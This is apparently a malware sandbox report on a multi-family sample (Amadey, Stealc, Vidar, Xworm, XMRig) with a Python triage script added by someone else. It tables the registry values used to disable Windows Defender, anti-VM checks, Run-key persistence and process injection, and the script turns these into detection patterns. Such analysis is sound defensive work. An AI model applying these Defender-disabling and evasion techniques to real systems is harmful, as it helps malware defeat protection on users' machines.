Analysis Overview
SHA256
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f
Threat Level: Known bad
The file 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f was found to be: Known bad.
Malicious Activity Summary
Xworm family
Stealc family
Systembc family
Healer family
LiteHTTP
Healer
Modifies Windows Defender TamperProtection settings
SystemBC
Detects Healer an antivirus disabler dropper
Amadey family
xmrig
Gcleaner family
Litehttp family
Amadey
Modifies Windows Defender DisableAntiSpyware settings
Vidar family
Modifies Windows Defender Real-time Protection settings
Stealc
Detect Xworm Payload
Vidar
Modifies Windows Defender notification settings
Xmrig family
Xworm
Detect Vidar Stealer
GCleaner
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Blocklisted process makes network request
.NET Reactor protector
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads user/profile data of local email clients
Identifies Wine through registry keys
Windows security modification
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Program crash
Enumerates physical storage devices
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Delays execution with timeout.exe
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 23:06
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 23:06
Reported
2025-03-05 23:09
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd0ae9eb0c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\cd0ae9eb0c.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\51a7d2c853.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\51a7d2c853.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\65ac27f01e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\65ac27f01e.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef30a65d57.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\ef30a65d57.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6410dd2f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\e6410dd2f6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ipzvs8T3\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
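The rows a responder pulls out of the tables above first are the Defender policy writes by e6410dd2f6.exe, the VirtualBox ACPI / Wine / BIOS-version probes, and the Run-key entries rapes.exe registers for its siblings. The following is an added example, not part of this report and not the sandbox vendor's code: a small Python triage that parses rows in the report's own "| Description | Indicator | Process | Target |" layout and sorts them into three buckets. The sample rows are copied from the tables above; the bucket names, the rule lists and the helper names are this example's own assumptions.

```python
"""Registry-event triage over the signature tables in this report.

Added example, not part of the sandbox report. Parses rows in the
"| Description | Indicator | Process | Target |" layout and buckets them
into Defender policy tampering, anti-VM probing and Run-key persistence.
Rule lists and bucket names are this example's own assumptions.
"""
import re
from collections import defaultdict

# Constructed sample input: rows copied from the tables in this report.
SAMPLE_ROWS = r'''
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6410dd2f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\e6410dd2f6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
'''

ROW_RE = re.compile(
    r"^\|\s*(?P<op>[^|]+?)\s*\|\s*(?P<ind>.+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|\s*(?P<target>[^|]*?)\s*\|$"
)


def parse_rows(text):
    """Yield (operation, key_path, value, process) for every table row in text."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        # "Set value" rows carry `path = "value"`; other rows have no value part.
        path, _, value = m.group("ind").partition(" = ")
        yield m.group("op"), path, value, m.group("proc")


def classify(op, path, value):
    """Map one registry event to a bucket name, or None when it is uninteresting."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    if op.startswith("Set value") and "\\microsoft\\windows defender" in p:
        # Policy switches that turn protection off are written as "1";
        # the TamperProtection feature flag is turned off by writing "0".
        if (name == "tamperprotection" and value == '"0"') or (
            name.startswith("disable") and value == '"1"'
        ):
            return "defender_tamper"
    if op == "Key opened" and p.endswith(("\\acpi\\dsdt\\vbox__", "\\software\\wine")):
        return "anti_vm"
    if op == "Key value queried" and name in ("systembiosversion", "videobiosversion"):
        return "anti_vm"
    if op.startswith("Set value") and "\\currentversion\\run\\" in p:
        return "run_key_persistence"
    return None


def triage(text):
    """Return {bucket: [(process, value_name, value), ...]} for the rows in text."""
    findings = defaultdict(list)
    for op, path, value, proc in parse_rows(text):
        bucket = classify(op, path, value)
        if bucket:
            findings[bucket].append((proc, path.rsplit("\\", 1)[-1], value))
    return dict(findings)


def by_process(findings):
    """Invert triage() output: which buckets each process hit."""
    out = defaultdict(set)
    for bucket, rows in findings.items():
        for proc, _name, _value in rows:
            out[proc].add(bucket)
    return dict(out)


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for bucket, rows in result.items():
        print(f"[{bucket}] {len(rows)} event(s)")
        for proc, name, value in rows:
            base = proc.rsplit("\\", 1)[-1]
            print(f"    {base:<16} {name} {value}".rstrip())
```

The anti_vm bucket is deliberately weak on its own: SystemBiosVersion and the Wine key are also read by legitimate installers and launchers, so treat it as corroboration next to the Defender writes and the Run-key entries rather than as a verdict. Note also that the detonation platform here is Windows 7 (win7-20240903-en), which has no tamper-protection feature for that Wow6432Node value to switch off, and on current Windows 10/11 builds with tamper protection on the Defender service rejects such edits from non-Microsoft processes; the attempted write is the signal, not its outcome.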
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| N/A | N/A | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1532 set thread context of 1688 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe |
| PID 2144 set thread context of 1420 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2508 set thread context of 1572 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3800 set thread context of 896 | N/A | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| PID 4072 set thread context of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe | N/A |
